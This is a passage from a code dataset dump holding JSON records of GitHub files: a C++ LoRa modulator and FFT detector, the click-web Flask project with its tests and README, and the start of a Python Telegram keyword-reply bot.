(_counter == 0) _state = STATE_SYNCWORD0;\n } break;\n\n ////////////////////////////////////////////////////////////////\n case STATE_SYNCWORD0:\n ////////////////////////////////////////////////////////////////\n {\n const int sw0 = (_sync >> 4)*8;\n const float freq = (2*M_PI*sw0)/NN;\n i = genChirp(samps, N, _ovs, NN, freq, false, _ampl, _phaseAccum);\n _state = STATE_SYNCWORD1;\n _id = \"SYNC\";\n } break;\n\n ////////////////////////////////////////////////////////////////\n case STATE_SYNCWORD1:\n ////////////////////////////////////////////////////////////////\n {\n const int sw1 = (_sync & 0xf)*8;\n const float freq = (2*M_PI*sw1)/NN;\n i = genChirp(samps, N, _ovs, NN, freq, false, _ampl, _phaseAccum);\n _state = STATE_DOWNCHIRP0;\n _id = \"\";\n } break;\n\n ////////////////////////////////////////////////////////////////\n case STATE_DOWNCHIRP0:\n ////////////////////////////////////////////////////////////////\n {\n i = genChirp(samps, N, _ovs, NN, 0.0f, true, _ampl, _phaseAccum);\n _state = STATE_DOWNCHIRP1;\n _id = \"DC\";\n } break;\n\n ////////////////////////////////////////////////////////////////\n case STATE_DOWNCHIRP1:\n ////////////////////////////////////////////////////////////////\n {\n i = genChirp(samps, N, _ovs, NN, 0.0f, true, _ampl, _phaseAccum);\n _state = STATE_QUARTERCHIRP;\n _id = \"\";\n } break;\n\n ////////////////////////////////////////////////////////////////\n case STATE_QUARTERCHIRP:\n ////////////////////////////////////////////////////////////////\n {\n i = genChirp(samps, N, _ovs, NN / 4, 0.0f, true, _ampl, _phaseAccum);\n _state = STATE_DATASYMBOLS;\n _counter = 0;\n _id = \"QC\";\n } break;\n\n ////////////////////////////////////////////////////////////////\n case STATE_DATASYMBOLS:\n ////////////////////////////////////////////////////////////////\n {\n const int sym = _payload.as<const uint16_t *>()[_counter++];\n const float freq = (2*M_PI*sym)/NN;\n i = genChirp(samps, N, _ovs, NN, freq, false, _ampl, _phaseAccum);\n \n if (_counter >= _payload.elements())\n {\n //for (size_t j = 0; j < _counter; j++)\n // std::cout << \"mod[\" << j << \"]=\" << _payload.as<const uint16_t *>()[j] << std::endl;\n _state = STATE_PADSYMBOLS;\n _counter = 0;\n }\n _id = \"S\" + std::to_string(_counter);\n } break;\n\n ////////////////////////////////////////////////////////////////\n case STATE_PADSYMBOLS:\n ////////////////////////////////////////////////////////////////\n {\n _counter++;\n for (i = 0; i < NN; i++) samps[i] = 0.0f;\n if (_counter >= _padding)\n {\n _state = STATE_WAITINPUT;\n outPort->postLabel(Pothos::Label(\"txEnd\", Pothos::Object(), N-1));\n }\n _id = \"\";\n } break;\n\n }\n\n if (not _id.empty())\n {\n outPort->postLabel(Pothos::Label(_id, Pothos::Object(), 0));\n }\n outPort->produce(i);\n }\n\n //! Custom output buffer manager with slabs large enough for output chirp\n Pothos::BufferManager::Sptr getOutputBufferManager(const std::string &name, const std::string &domain)\n {\n if (name == \"0\")\n {\n this->output(name)->setReserve(N * _ovs);\n Pothos::BufferManagerArgs args;\n args.bufferSize = N * _ovs *sizeof(std::complex<float>);\n return Pothos::BufferManager::make(\"generic\", args);\n }\n return Pothos::Block::getOutputBufferManager(name, domain);\n }\n\nprivate:\n //configuration\n const size_t N;\n\tsize_t _ovs;\n unsigned char _sync;\n size_t _padding;\n float _ampl;\n\tfloat _phaseAccum;\n //state\n enum LoraDemodState\n {\n STATE_WAITINPUT,\n STATE_FRAMESYNC,\n STATE_SYNCWORD0,\n STATE_SYNCWORD1,\n STATE_DOWNCHIRP0,\n STATE_DOWNCHIRP1,\n STATE_QUARTERCHIRP,\n STATE_DATASYMBOLS,\n STATE_PADSYMBOLS,\n };\n LoraDemodState _state;\n size_t _counter;\n Pothos::BufferChunk _payload;\n std::string _id;\n};\n\nstatic Pothos::BlockRegistry registerLoRaMod(\n \"/lora/lora_mod\", &LoRaMod::make);\n"
},
{
"alpha_fraction": 0.5216080546379089,
"alphanum_fraction": 0.5442211031913757,
"avg_line_length": 26.63888931274414,
"blob_id": "a0f5c25b7d8275db77ba056468e31da379bad983",
"content_id": "09c93cad99b0f5ec0fbb8c45dc07b90f62d08cfe",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1990,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 72,
"path": "/LoRaDetector.hpp",
"repo_name": "myriadrf/LoRa-SDR",
"src_encoding": "UTF-8",
"text": "// Copyright (c) 2016-2016 Lime Microsystems\n// SPDX-License-Identifier: BSL-1.0\n\n#include \"kissfft.hh\"\n#include <complex>\n#include <vector>\n\ntemplate <typename Type>\nclass LoRaDetector\n{\npublic:\n LoRaDetector(const size_t N):\n N(N),\n _fftInput(N),\n _fftOutput(N),\n _fft(N, false)\n {\n _powerScale = 20*std::log10(N);\n return;\n }\n\n //! feed simply sets an input sample\n void feed(const size_t i, const std::complex<Type> &samp)\n {\n _fftInput[i] = samp;\n }\n\n //! calculates argmax(abs(fft(input)))\n size_t detect(Type &power, Type &powerAvg, Type &fIndex, std::complex<Type> *fftOutput = nullptr)\n {\n if (fftOutput == nullptr) fftOutput = _fftOutput.data();\n _fft.transform(_fftInput.data(), fftOutput);\n size_t maxIndex = 0;\n Type maxValue = 0;\n double total = 0;\n for (size_t i = 0; i < N; i++)\n {\n auto bin = fftOutput[i];\n auto re = bin.real();\n auto im = bin.imag();\n auto mag2 = re*re + im*im;\n total += mag2;\n if (mag2 > maxValue)\n {\n maxIndex = i;\n maxValue = mag2;\n }\n }\n\n const auto noise = std::sqrt(Type(total - maxValue));\n const auto fundamental = std::sqrt(maxValue);\n\n powerAvg = 20*std::log10(noise) - _powerScale;\n power = 20*std::log10(fundamental) - _powerScale;\n\n auto left = std::abs(fftOutput[maxIndex > 0?maxIndex-1:N-1]);\n auto right = std::abs(fftOutput[maxIndex < N-1?maxIndex+1:0]);\n\n const auto demon = (2.0 * fundamental) - right - left;\n if (demon == 0.0) fIndex = 0.0; //check for divide by 0\n else fIndex = 0.5 * (right - left) / demon;\n\n return maxIndex;\n }\n\nprivate:\n const size_t N;\n Type _powerScale;\n std::vector<std::complex<Type>> _fftInput;\n std::vector<std::complex<Type>> _fftOutput;\n kissfft<Type> _fft;\n};\n"
}
] | 17 |
JayBigGuy10/click-web | https://github.com/JayBigGuy10/click-web | dcdc61cf55c9a464dedd63df09753a372310a1ad | ca88e118a283c92bff214e6fa0502db629d7dd1e | 707533118e94886ed3a8b5afdfb3c9256c91b091 | refs/heads/master | 2020-04-20T17:14:00.023547 | 2019-02-03T10:26:17 | 2019-02-03T10:26:17 | 168,982,849 | 0 | 0 | MIT | 2019-02-03T19:13:43 | 2019-02-03T10:26:25 | 2019-02-03T10:26:24 | null | [
{
"alpha_fraction": 0.6366001963615417,
"alphanum_fraction": 0.6374675035476685,
"avg_line_length": 31.02777862548828,
"blob_id": "360467fce913f71869df8d95e8d07770a006d78b",
"content_id": "4a04a1509951128cdc472e91f4c9818d7628bd53",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1153,
"license_type": "permissive",
"max_line_length": 112,
"num_lines": 36,
"path": "/click_web/resources/index.py",
"repo_name": "JayBigGuy10/click-web",
"src_encoding": "UTF-8",
"text": "from collections import OrderedDict\n\nimport click\n\nimport click_web\n\nfrom flask import render_template\n\n\ndef index():\n with click.Context(click_web.click_root_cmd, info_name=click_web.click_root_cmd.name, parent=None) as ctx:\n return render_template('show_tree.html.j2', ctx=ctx, tree=_click_to_tree(ctx, click_web.click_root_cmd))\n\n\ndef _click_to_tree(ctx: click.Context, node: click.BaseCommand, ancestors=[]):\n '''\n Convert a click root command to a tree of dicts and lists\n :return: a json like tree\n '''\n res_childs = []\n res = OrderedDict()\n res['is_group'] = isinstance(node, click.core.MultiCommand)\n if res['is_group']:\n # a group, recurse for every child\n for key in node.list_commands(ctx):\n child = node.get_command(ctx, key)\n res_childs.append(_click_to_tree(ctx, child, ancestors[:] + [node, ]))\n\n res['name'] = node.name\n res['short_help'] = node.get_short_help_str()\n res['help'] = node.help\n path_parts = ancestors + [node]\n res['path'] = '/' + '/'.join(p.name for p in path_parts)\n if res_childs:\n res['childs'] = res_childs\n return res\n"
},
{
"alpha_fraction": 0.5658201575279236,
"alphanum_fraction": 0.566094696521759,
"avg_line_length": 28.856557846069336,
"blob_id": "78f0770716820c98f641161deabd128d6ac660f9",
"content_id": "82ac5f9c08f9de7e3e86a4daf79456032c97da52",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7285,
"license_type": "permissive",
"max_line_length": 110,
"num_lines": 244,
"path": "/click_web/resources/input_fields.py",
"repo_name": "JayBigGuy10/click-web",
"src_encoding": "UTF-8",
"text": "import click\n\nfrom click_web import exceptions\nfrom click_web.web_click_types import EmailParamType\n\nseparator = '.'\n\n\nclass NotSupported(ValueError):\n pass\n\n\nclass BaseInput:\n param_type_cls = None\n\n def __init__(self, ctx, param: click.Parameter, command_index, param_index):\n self.ctx = ctx\n self.param = param\n self.command_index = command_index\n self.param_index = param_index\n if not self.is_supported():\n raise NotSupported()\n\n def is_supported(self):\n return isinstance(self.param.type, self.param_type_cls)\n\n @property\n def fields(self) -> dict:\n field = {}\n param = self.param\n\n field['param'] = param.param_type_name\n if param.param_type_name == 'option':\n name = '--{}'.format(self._to_cmd_line_name(param.name))\n field['value'] = param.default if param.default else ''\n field['checked'] = 'checked=\"checked\"' if param.default else ''\n field['desc'] = param.help\n field['help'] = param.get_help_record(self.ctx)\n elif param.param_type_name == 'argument':\n name = self._to_cmd_line_name(param.name)\n field['value'] = param.default\n field['checked'] = ''\n field['help'] = ''\n\n field['name'] = self._build_name(name)\n field['required'] = param.required\n\n if param.nargs < 0:\n raise exceptions.ClickWebException(\"Parameters with unlimited nargs not supportet at the moment.\")\n field['nargs'] = param.nargs\n field['human_readable_name'] = param.human_readable_name.replace('_', ' ')\n field.update(self.type_attrs)\n return field\n\n @property\n def type_attrs(self) -> dict:\n \"\"\"\n Here the input type and type specific information should be retuned as a dict\n :return:\n \"\"\"\n raise NotImplementedError()\n\n def _to_cmd_line_name(self, name: str) -> str:\n return name.replace('_', '-')\n\n def _build_name(self, name: str):\n \"\"\"\n Construct a name to use for field in form that have information about\n what sub-command it belongs order index (for later sorting) and type of parameter.\n \"\"\"\n # get the type of param to encode the in the name\n if self.param.param_type_name == 'option':\n param_type = 'flag' if self.param.is_bool_flag else 'option'\n else:\n param_type = self.param.param_type_name\n\n click_type = self.type_attrs['click_type']\n form_type = self.type_attrs['type']\n\n # in order for form to be have arguments for sub commands we need to add the\n # index of the command the argument belongs to\n return separator.join(str(p) for p in (self.command_index,\n self.param_index,\n param_type,\n click_type,\n form_type,\n name))\n\n\nclass ChoiceInput(BaseInput):\n param_type_cls = click.Choice\n\n @property\n def type_attrs(self):\n type_attrs = {}\n type_attrs['type'] = 'option'\n type_attrs['options'] = self.param.type.choices\n type_attrs['click_type'] = 'choice'\n return type_attrs\n\n\nclass FlagInput(BaseInput):\n def is_supported(self, ):\n return self.param.param_type_name == 'option' and self.param.is_bool_flag\n\n @property\n def type_attrs(self):\n type_attrs = {}\n type_attrs['type'] = 'checkbox'\n type_attrs['click_type'] = 'bool_flag'\n return type_attrs\n\n\nclass IntInput(BaseInput):\n param_type_cls = click.types.IntParamType\n\n @property\n def type_attrs(self):\n type_attrs = {}\n type_attrs['type'] = 'number'\n type_attrs['step'] = '1'\n type_attrs['click_type'] = 'int'\n return type_attrs\n\n\nclass FloatInput(BaseInput):\n param_type_cls = click.types.FloatParamType\n\n @property\n def type_attrs(self):\n type_attrs = {}\n type_attrs['type'] = 'number'\n type_attrs['step'] = 'any'\n type_attrs['click_type'] = 'float'\n return type_attrs\n\n\nclass FolderInput(BaseInput):\n\n def is_supported(self):\n if isinstance(self.param.type, click.Path):\n if self.param.type.dir_okay:\n return True\n return False\n\n @property\n def type_attrs(self):\n type_attrs = {}\n # if it is required we treat it as an input folder\n # and only accept zip.\n mode = 'r' if self.param.type.exists else 'w'\n type_attrs['click_type'] = f'path[{mode}]'\n if self.param.type.exists:\n type_attrs['accept'] = \"application/zip\"\n type_attrs['type'] = 'file'\n else:\n type_attrs['type'] = 'hidden'\n return type_attrs\n\n\nclass FileInput(BaseInput):\n\n def is_supported(self):\n if isinstance(self.param.type, click.File):\n return True\n elif isinstance(self.param.type, click.Path):\n if (self.param.type.file_okay):\n return True\n return False\n\n @property\n def type_attrs(self):\n type_attrs = {}\n if isinstance(self.param.type, click.File):\n mode = self.param.type.mode\n else:\n # TODO: figure out\n mode = 'r'\n\n type_attrs['click_type'] = f'file[{mode}]'\n\n if 'r' not in mode:\n if self.param.required:\n # if file is only for output do not show in form\n type_attrs['type'] = 'hidden'\n else:\n type_attrs['type'] = 'text'\n\n else:\n type_attrs['type'] = 'file'\n return type_attrs\n\n\nclass EmailInput(BaseInput):\n param_type_cls = EmailParamType\n\n @property\n def type_attrs(self):\n type_attrs = {}\n type_attrs['type'] = 'email'\n type_attrs['click_type'] = 'email'\n return type_attrs\n\n\nclass DefaultInput(BaseInput):\n param_type_cls = click.ParamType\n\n @property\n def type_attrs(self):\n type_attrs = {}\n type_attrs['type'] = 'text'\n type_attrs['click_type'] = 'text'\n return type_attrs\n\n\n'''\nThe types of inputs we support form inputs listed in priority order (first that matches will be selected).\nTo add new Input handling for html forms for custom Parameter types just Subclass BaseInput and insert\nthe class in the list.\n'''\nINPUT_TYPES = [ChoiceInput,\n FlagInput,\n IntInput,\n FloatInput,\n FolderInput,\n FileInput,\n EmailInput]\n\n_DEFAULT_INPUT = [DefaultInput]\n\n\ndef get_input_field(ctx: click.Context, param: click.Parameter, command_index, param_index) -> dict:\n \"\"\"\n Convert a click.Parameter into a dict structure describing a html form option\n \"\"\"\n for input_cls in INPUT_TYPES + _DEFAULT_INPUT:\n try:\n input_type = input_cls(ctx, param, command_index, param_index)\n except NotSupported:\n pass\n else:\n fields = input_type.fields\n return fields\n raise NotSupported(f\"No Form input type not supported: {param}\")\n"
},
{
"alpha_fraction": 0.8028169274330139,
"alphanum_fraction": 0.8098591566085815,
"avg_line_length": 46.33333206176758,
"blob_id": "2d137106c8010cad9d64b7f54c6863c643fb1fb1",
"content_id": "432408ff29024f9d3affc873dc629d001060f482",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 142,
"license_type": "permissive",
"max_line_length": 72,
"num_lines": 3,
"path": "/tests/conftest.py",
"repo_name": "JayBigGuy10/click-web",
"src_encoding": "UTF-8",
"text": "# flake8: noqa\nfrom tests.fixtures.click_fixtures import loaded_script_module, cli, ctx\nfrom tests.fixtures.flask_fixtures import app, client\n"
},
{
"alpha_fraction": 0.6320056319236755,
"alphanum_fraction": 0.6337680816650391,
"avg_line_length": 40.72058868408203,
"blob_id": "ab70ae9aeff25d874a575cbd1de69b73901a6338",
"content_id": "08e3d9fbd98d278857a35d2d3e07326bd663bc61",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2837,
"license_type": "permissive",
"max_line_length": 119,
"num_lines": 68,
"path": "/click_web/resources/cmd_form.py",
"repo_name": "JayBigGuy10/click-web",
"src_encoding": "UTF-8",
"text": "from typing import List, Tuple\n\nimport click\nfrom flask import render_template, abort\n\nimport click_web\nfrom click_web.exceptions import CommandNotFound\nfrom click_web.resources.input_fields import get_input_field\n\n\ndef get_form_for(command_path: str):\n try:\n ctx_and_commands = _get_commands_by_path(command_path)\n except CommandNotFound as err:\n return abort(404, str(err))\n\n levels = _generate_form_data(ctx_and_commands)\n return render_template('command_form.html.j2',\n levels=levels,\n command=levels[-1]['command'],\n command_path=command_path)\n\n\ndef _get_commands_by_path(command_path: str) -> Tuple[click.Context, click.Command]:\n \"\"\"\n Take a (slash separated) string and generate (context, command) for each level.\n :param command_path: \"some_group/a_command\"\n :return: Return a list from root to leaf commands. each element is (Click.Context, Click.Command)\n \"\"\"\n command_path_items = command_path.split('/')\n command_name, *command_path_items = command_path_items\n command = click_web.click_root_cmd\n if command.name != command_name:\n raise CommandNotFound('Failed to find root command {}. There is a root commande named:{}'\n .format(command_name, command.name))\n result = []\n with click.Context(command, info_name=command, parent=None) as ctx:\n result.append((ctx, command))\n # dig down the path parts to find the leaf command\n parent_command = command\n for command_name in command_path_items:\n command = parent_command.get_command(ctx, command_name)\n if command:\n # create sub context for command\n ctx = click.Context(command, info_name=command, parent=ctx)\n parent_command = command\n else:\n raise CommandNotFound('Failed to find command for path \"{}\". Command \"{}\" not found. Must be one of {}'\n .format(command_path, command_name, parent_command.list_commands(ctx)))\n result.append((ctx, command))\n return result\n\n\ndef _generate_form_data(ctx_and_commands: List[Tuple[click.Context, click.Command]]):\n \"\"\"\n Construct a list of contexts and commands generate a python data structure for rendering jinja form\n :return: a list of dicts\n \"\"\"\n levels = []\n for command_index, (ctx, command) in enumerate(ctx_and_commands):\n # force help option off, no need in web.\n command.add_help_option = False\n\n input_fields = [get_input_field(ctx, param, command_index, param_index)\n for param_index, param in enumerate(command.get_params(ctx))]\n levels.append({'command': command, 'fields': input_fields})\n\n return levels\n"
},
{
"alpha_fraction": 0.5739532113075256,
"alphanum_fraction": 0.598694920539856,
"avg_line_length": 34.36538314819336,
"blob_id": "c6e0649821a3d7cbe7ef25d683d0221da07861d3",
"content_id": "3fc6ef553191bfdf35cd68c2ee6aba7c23ea9bf9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3681,
"license_type": "permissive",
"max_line_length": 106,
"num_lines": 104,
"path": "/tests/test_flask_app.py",
"repo_name": "JayBigGuy10/click-web",
"src_encoding": "UTF-8",
"text": "import pytest\nfrom bs4 import BeautifulSoup\n\n\ndef test_get_index(app, client):\n resp = client.get('/')\n assert resp.status_code == 200\n assert b'the root command' in resp.data\n\n\[email protected](\n 'command_path, response_code, expected_msg, expected_form_ids',\n [\n ('/cli/simple-no-params-command', 200, b'<title>Simple-No-Params-Command</title>',\n [\n '0.0.flag.bool_flag.checkbox.--debug'\n ]),\n ('/cli/unicode-test', 200, 'Åäö'.encode('utf-8'),\n [\n '0.0.flag.bool_flag.checkbox.--debug',\n '1.0.option.choice.option.--unicode-msg'\n ]\n ),\n ('/cli/command-with-option-and-argument', 200, b'<title>Command-With-Option-And-Argument</title>',\n [\n '0.0.flag.bool_flag.checkbox.--debug',\n '1.0.option.text.text.--an-option',\n '1.1.argument.int.number.an-argument'\n ]),\n ('/cli/sub-group/a-sub-group-command', 200, b'<title>A-Sub-Group-Command</title>',\n [\n '0.0.flag.bool_flag.checkbox.--debug'\n ]),\n ('/cli/command-with-input-folder', 200, b'<title>Command-With-Input-Folder</title>',\n [\n '0.0.flag.bool_flag.checkbox.--debug',\n '1.0.argument.path[r].file.folder'\n ]),\n ('/cli/command-with-output-folder', 200, b'<title>Command-With-Output-Folder</title>',\n [\n '0.0.flag.bool_flag.checkbox.--debug',\n '1.0.argument.path[w].hidden.folder']),\n ]\n)\ndef test_get_command(command_path, response_code, expected_msg, expected_form_ids, app, client):\n resp = client.get(command_path)\n form_ids = _get_form_ids(resp.data)\n print(form_ids)\n print(resp.data)\n assert resp.status_code == response_code\n assert expected_msg in resp.data\n assert expected_form_ids == form_ids\n\n\ndef _get_form_ids(html):\n soup = BeautifulSoup(html, 'html.parser')\n form_ids = [elem['name'] for elem in soup.find_all(['input', 'select'])]\n return form_ids\n\n\ndef test_exec_command(app, client):\n resp = client.post('/cli/simple-no-params-command')\n assert resp.status_code == 200\n assert b'Simpel noparams command called' in resp.data\n\n\ndef test_exec_sub_command(app, client):\n resp = client.post('/cli/sub-group/a-sub-group-command')\n assert resp.status_code == 200\n assert b'Sub group command called' in resp.data\n\n\ndef test_exec_default_arg_and_opt(app, client):\n resp = client.post('/cli/command-with-option-and-argument')\n assert resp.status_code == 200\n assert b'Ran command with option: option_value argument 10' in resp.data\n\n\[email protected](\n 'form_data, expected_msg',\n [\n ({'0.0.flag.bool_flag.--debug': None,\n '1.0.option.text.--an-option': None,\n '1.1.argument.int.an-argument': None\n },\n b'Ran command with option: option_value argument 10'),\n ({'0.0.flag.bool_flag.checkbox.--debug': None,\n '1.0.option.text.text.--an-option': None,\n '1.1.argument.int.number.an-argument': 321\n },\n b'Ran command with option: option_value argument 321'),\n ({'0.0.flag.bool_flag.checkbox.--debug': None,\n '1.0.option.text.text.--an-option': 'ABC',\n '1.1.argument.int.number.an-argument': 321\n },\n b'Ran command with option: ABC argument 321'),\n\n ])\ndef test_exec_with_arg_and_default_opt(form_data, expected_msg, app, client):\n resp = client.post('/cli/command-with-option-and-argument',\n data=form_data)\n assert resp.status_code == 200\n print(resp.data)\n assert expected_msg in resp.data\n"
},
{
"alpha_fraction": 0.6144813895225525,
"alphanum_fraction": 0.626223087310791,
"avg_line_length": 24.549999237060547,
"blob_id": "b38a9549300300084f3b0571e55673bc06d22f56",
"content_id": "18174a2bae5b86d2b25d9fd7977d2252054a419f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 511,
"license_type": "permissive",
"max_line_length": 111,
"num_lines": 20,
"path": "/click_web/web_click_types.py",
"repo_name": "JayBigGuy10/click-web",
"src_encoding": "UTF-8",
"text": "\"\"\"\nModule contains click types that could be useful on web pages and provide form validation by just setting type.\n\"\"\"\nimport re\n\nimport click\n\n\nclass EmailParamType(click.ParamType):\n name = 'email'\n EMAIL_REGEX = re.compile(r\"(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\\.[a-zA-Z0-9-.]+$)\")\n\n def convert(self, value, param, ctx):\n if self.EMAIL_REGEX.match(value):\n return value\n else:\n self.fail(f'{value} is not a valid email', param, ctx)\n\n\nEMAIL_TYPE = EmailParamType()\n"
},
{
"alpha_fraction": 0.6159809231758118,
"alphanum_fraction": 0.6189624071121216,
"avg_line_length": 20.240507125854492,
"blob_id": "e8c3352f844e25273efde948aa1f08d53ac2dc6a",
"content_id": "3f9da530cf918456cdba07c57ce7d8256db91516",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 1677,
"license_type": "permissive",
"max_line_length": 103,
"num_lines": 79,
"path": "/README.rst",
"repo_name": "JayBigGuy10/click-web",
"src_encoding": "UTF-8",
"text": "click-web\n=========\n\nServe click scripts over the web with minimal effort.\n\n*Caution*: No security (login etc.), do not serve scripts publicly.\n\nUsage\n-----\n\nSee this demo `screen capture`_.\n\n.. _screen capture: https://github.com/fredrik-corneliusson/click-web/raw/master/doc/click-web-demo.gif\n\nTake an existing click script, like this one:\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n``example_command.py``\n\n::\n\n import click\n import time\n\n @click.group()\n def cli():\n 'A stupid script to test click-web'\n pass\n\n @cli.command()\n @click.option(\"--delay\", type=float, default=0.01, help='delay for every line print')\n @click.argument(\"lines\", default=10, type=int)\n def print_rows(lines, delay):\n 'Print lines with a delay'\n click.echo(f\"writing: {lines} with {delay}\")\n for i in range(lines):\n click.echo(f\"Hello row: {i}\")\n time.sleep(delay)\n\n if __name__ == '__main__':\n cli()\n\nCreate a minimal script to run with flask\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n``app.py``\n\n::\n\n from click_web import create_click_web_app\n import example_command\n\n app = create_click_web_app(example_command, example_command.cli)\n\nRunning example app:\n~~~~~~~~~~~~~~~~~~~~\n\nIn Bash:\n\n::\n\n export FLASK_ENV=development\n export FLASK_APP=app.py\n flask run\n\nUnsupported click features\n==========================\n\nIt has only been tested with basic click features, and most advanced\nfeatures will probably not work.\n\n- Variadic Arguments (will need some JS on client side)\n- Promts (probably never will)\n- Custom ParamTypes (depending on implementation)\n\nTODO\n====\n\n- Abort started/running processes."
}
] | 7 |
fspieler/cards | https://github.com/fspieler/cards | 16a01c49f514df5f114a01f16cf2d85d1b3beb23 | 926132c7f205a5353e205321ccf602daa0ef7b3e | 5ef2f77acf05749cd76381e21a438e3ddfaae7e3 | refs/heads/master | 2020-12-25T12:07:36.321291 | 2017-04-15T05:38:42 | 2017-04-15T05:38:42 | 88,323,207 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.4863123893737793,
"alphanum_fraction": 0.48792269825935364,
"avg_line_length": 22,
"blob_id": "48cbf57d598dc111cd98f9c69de2cb344ac46deb",
"content_id": "a1c16b765910b8a6682bfe0e6446a08efc34c835",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 621,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 27,
"path": "/cards_impl/user.py",
"repo_name": "fspieler/cards",
"src_encoding": "UTF-8",
"text": "#/usr/bin/env python3\n\nclass User(object):\n def __init__(self,user_id=None):\n if user_id == None:\n self.new_user = True\n user_id = time.time()\n else:\n self.new_user = False\n #fetch all records from db about user_id\n self._populateUser() \n\n def commit(self):\n if self.new_user:\n pass\n else:\n #Do UPDATES \n pass\n\n def hole_cards():\n # fetch cards for user_id\n pass\n\n def delete(self):\n if self.new_user == False:\n return False\n # Delete user code here\n"
},
{
"alpha_fraction": 0.7446808218955994,
"alphanum_fraction": 0.7446808218955994,
"avg_line_length": 22.5,
"blob_id": "44edad19e24bffe28491fe4d69db714d4b68e984",
"content_id": "ea23e7ac1a2c19a143fbda893129654ea72439b2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 94,
"license_type": "no_license",
"max_line_length": 27,
"num_lines": 4,
"path": "/cards_impl/__init__.py",
"repo_name": "fspieler/cards",
"src_encoding": "UTF-8",
"text": "from .pokerHands import *\nfrom .card import *\nfrom .orderedCards import *\nfrom .user import *\n"
}
] | 2 |
TomHaridi/Avimitin_Bot | https://github.com/TomHaridi/Avimitin_Bot | 6c60c737e74047e3150e1b3a4b49d37e4a208c43 | 8529de292b766ebe027534ac73587d4338966729 | 59135ac7311a035a6975998911a4875422ef2752 | refs/heads/master | 2023-03-15T12:52:02.171408 | 2020-06-19T03:14:33 | 2020-06-19T03:14:33 | 521,868,717 | 1 | 0 | null | 2022-08-06T06:41:11 | 2021-08-08T06:37:28 | 2020-06-19T03:14:46 | null | [
{
"alpha_fraction": 0.6021876931190491,
"alphanum_fraction": 0.6102475523948669,
"avg_line_length": 36.48920822143555,
"blob_id": "8d3a1eba444c8cc8387b197594d67dfb682db327",
"content_id": "00b679c3641cceea8053a159de67558b7f363e92",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5733,
"license_type": "no_license",
"max_line_length": 113,
"num_lines": 139,
"path": "/Bot1.py",
"repo_name": "TomHaridi/Avimitin_Bot",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# author: Avimitin\n# datetime: 2020/3/27 18:04\nimport telebot\nfrom telebot import types\nimport random\nimport yaml\nimport re\nimport json\nimport logging\nimport time\nfrom modules import regexp_search\n\nlogger = telebot.logger\ntelebot.logger.setLevel(logging.DEBUG)\n\n# 从config文件读取token\nwith open(\"config/config.yaml\", 'r+', encoding='UTF-8') as token_file:\n bot_token = yaml.load(token_file, Loader=yaml.FullLoader)\nTOKEN = bot_token['TOKEN']\n\n# 实例化机器人\nbot = telebot.TeleBot(TOKEN)\n\n\n# 命令返回语句\[email protected]_handler(commands=['start'])\ndef send_welcome(message):\n new_message = bot.send_message(message.chat.id, \"咱是个可爱的回话机器人\")\n time.sleep(120)\n bot.delete_message(chat_id=new_message.chat.id, message_id=new_message.message_id)\n\n\[email protected]_handler(commands=['help'])\ndef send_help(message):\n new_message = bot.send_message(message.chat.id, \"你需要什么帮助?随便提,反正我帮不上忙\")\n time.sleep(120)\n bot.delete_message(chat_id=new_message.chat.id, message_id=new_message.message_id)\n\n\n# 关键词添加程序\[email protected]_handler(commands=['add'])\ndef add_keyword(message):\n if message.from_user.username != 'example':\n new_message = bot.send_message(message.chat.id, '别乱碰我!')\n time.sleep(120)\n bot.delete_message(chat_id=new_message.chat.id, message_id=new_message.message_id)\n else:\n if len(message.text) == 4:\n bot.send_message(message.chat.id, '/add 命令用法: `/add keyword=value` 。请不要包含空格。', parse_mode='Markdown')\n elif re.search(r' ', message.text[5:]):\n bot.send_message(message.chat.id, '请不要包含空格!')\n else:\n text = message.text[5:]\n split_sen = re.split(r'=', text)\n split_sen_dic = {split_sen[0]: split_sen[1]}\n bot.send_message(message.chat.id, '我已经学会了,当你说{}的时候,我会回复{}'.format(split_sen[0], split_sen[1]))\n with open('config/Reply.yml', 'a+', encoding='UTF-8') as reply_file:\n reply_file.write('\\n')\n yaml.dump(split_sen_dic, reply_file, allow_unicode=True)\n\n\n# 关键词删除程序\[email protected]_handler(commands=['delete'])\ndef del_keyword(message):\n if message.from_user.username != 'SaiToAsuKa_kksk':\n new_message = bot.send_message(message.chat.id, '你不是我老公,爬')\n time.sleep(10)\n bot.delete_message(chat_id=new_message.chat.id, message_id=new_message.message_id)\n else:\n if len(message.text) == 7:\n bot.send_message(message.chat.id, \"/delete usage: `/delete keyword`.\", parse_mode='Markdown')\n else:\n text = message.text[8:]\n with open('config/Reply.yml', 'r+', encoding='UTF-8') as reply_file:\n reply_msg_dic = yaml.load(reply_file, Loader=yaml.FullLoader)\n if reply_msg_dic.get(text):\n del reply_msg_dic[text]\n bot.send_message(message.chat.id, '已经删除{}'.format(text))\n with open('config/Reply.yml', 'w+', encoding='UTF-8') as new_file:\n yaml.dump(reply_msg_dic, new_file, allow_unicode=True)\n else:\n msg = bot.send_message(message.chat.id, '没有找到该关键词')\n time.sleep(5)\n bot.delete_message(msg.chat.id, 